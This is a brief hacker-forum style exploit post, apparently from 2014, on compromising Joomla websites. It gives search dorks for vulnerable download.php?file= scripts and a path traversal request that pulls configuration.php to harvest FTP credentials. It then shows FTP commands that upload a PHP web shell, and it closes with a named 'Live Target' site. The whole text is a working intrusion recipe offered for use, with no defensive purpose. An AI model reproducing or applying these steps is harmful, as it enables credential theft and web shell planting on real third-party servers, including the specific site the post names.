Priv8 Exploit Upload Shell Via FTP CMD (Joomla)

Chúng ta bắt đầu nhé

##################################################################
# Exploit Title: Priv8 Exploit Upload Shell Via FTP CMD (Joomla)
# Author: CoderSec
# Contact: https://www.facebook.com/profile.php?id=100004954872423
# Follow me on YOUTUBE : https://www.youtube.com/user/Dinz011
# Date: 25/07/2014
# Tested on : Windows
##################################################################

Dork:
inurl:/download.php?file=
inurl:/force-download.php?file=
Explorer ur brain

Get Database :
ww.site.com/download.php?file=configuration.php
ww.site.com/force-download.php?file=configuration.php

Find FTP User And FTP Password On Database :
var $Ftp_User : 'user'
var $Ftp_pass : 'user'
var $Ftp_root : 'public_html'

Upload Shell via FTP CMD
1. Open CMD
Example :
C:\Documents and Settings\USER> ftp site.com
to www.site.com
Connected to site.com
username : user
331 Password Required for example
Password : password
user Loged in
ftp> ls
public_html ( view var $ftp_root ) --> If var $ftp_root : 'public_html' ( cd public_html )
ftp>cd public_html
ftp> put "C:\CoderSec.php" << shell Command Success File Transfered Shell Access : www.site.com/CoderSec.php Live Target : http://hisardoot.co.il/ISD/knife%20..%20configuration.php